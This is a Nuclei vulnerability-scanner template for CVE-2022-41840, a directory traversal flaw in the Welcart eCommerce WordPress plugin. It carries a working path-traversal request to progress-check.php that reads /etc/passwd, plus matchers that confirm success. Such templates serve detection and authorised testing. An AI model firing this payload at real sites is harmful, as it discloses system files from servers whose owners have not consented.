nuclei-templates/cves/2022/CVE-2022-41840.yaml

39 lines
1.1 KiB
YAML

id: CVE-2022-41840
info:
name: Welcart eCommerce <= 2.7.7 - Unauth Directory Traversal
author: theamanrawat
severity: high
description: |
Unauth. Directory Traversal vulnerability in Welcart eCommerce plugin <= 2.7.7 on WordPress.
reference:
- https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability
- https://wordpress.org/plugins/usc-e-shop/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41840
classification:
cve-id: CVE-2022-41840
metadata:
verified: "true"
tags: cve,cve2022,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200